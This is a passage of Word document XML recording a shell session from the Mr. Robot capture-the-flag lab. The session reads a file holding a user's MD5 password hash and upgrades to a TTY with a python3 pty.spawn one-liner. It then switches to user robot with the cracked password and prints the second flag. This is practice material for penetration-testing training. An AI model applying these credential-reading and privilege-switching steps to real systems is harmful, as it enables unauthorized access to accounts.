        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="02F2F611" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3DD69689" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>var</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C59CDA0" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vmlinuz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C326B62" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>$ cd /home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454E7CF9" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>$ la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1D2549" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: 10: la: not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2C50A3" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1E6570" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>robot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38266CEE" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>$ ls robot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352DA7E0" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>key-2-of-3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338E05CE" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>password.raw-md5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8189F9" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>$ ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06970302" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>total 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5B0644" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822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Nov 13  2015 .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410C54CA" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822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22 root </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4096 Sep </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>16  2015</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111DAD6A" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822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Nov 13  2015 robot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9281CB" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>$ cd robot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218A0AC3" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CB8F4A" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>key-2-of-3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6744E96A" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>password.raw-md5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BB780D" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>$ ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F95DD2" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>total 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049105A1" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822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gramStart"/>
      <w:r>
        <w:t xml:space="preserve">root  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">  4096 Nov 13  2015 .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9197C7" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822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gramStart"/>
      <w:r>
        <w:t xml:space="preserve">root  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">  4096 Nov 13  2015 ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E78802A" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t xml:space="preserve">-r-------- 1 robot </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>robot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   33 Nov </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>13  2015</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> key-2-of-3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD9A10C" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-r--r-- 1 robot </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>robot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   39 Nov </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>13  2015</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> password.raw-md5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0448BC" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>$ cat password.raw-md5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E674C68" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>robot:c3fcd3d76192e4007dfb496cca67e13b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEB1223" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> robot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3423B92F" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: must be run from a terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59840C46" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t xml:space="preserve">$ python3 -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D7CF38" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>daemon@linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:/home/robot$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> robot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27355F80" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> robot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459D8844" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abcdefghijklmnopqrstuvwxyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47817F94" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06"/>
    <w:p w14:paraId="4E0839AA" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>robot@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>$ id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9913FD" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A0939A" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1002(robot) gid=1002(robot) groups=1002(robot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364B2162" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>robot@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B4C8D68" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="42D9C2B2" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>robot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370F0081" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>robot@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55932689" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093A2F2A" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>key-2-of-3.txt  password.raw</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-md5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1830061F" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>robot@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>$ cat key-2-of-3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05679F05" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>cat key-2-of-3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734C286D" w14:textId="77777777" w:rsidR="00822A06" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:r>
        <w:t>822c73956184f694993bede3eb39f959</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFE6AB6" w14:textId="4BB7E4D8" w:rsidR="000B5AC1" w:rsidRDefault="00822A06" w:rsidP="00822A06">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>robot@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>$</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000B5AC1" w:rsidSect="00822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B"/>
    <w:rsid w:val="000B5AC1"/>
    <w:rsid w:val="00506F5B"/>
    <w:rsid w:val="007059E3"/>
    <w:rsid w:val="0082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836D-87A1-439D-9497-A2E959B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/>
  <cp:lastModifiedBy>Samarth</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-14T05:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-14T05:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>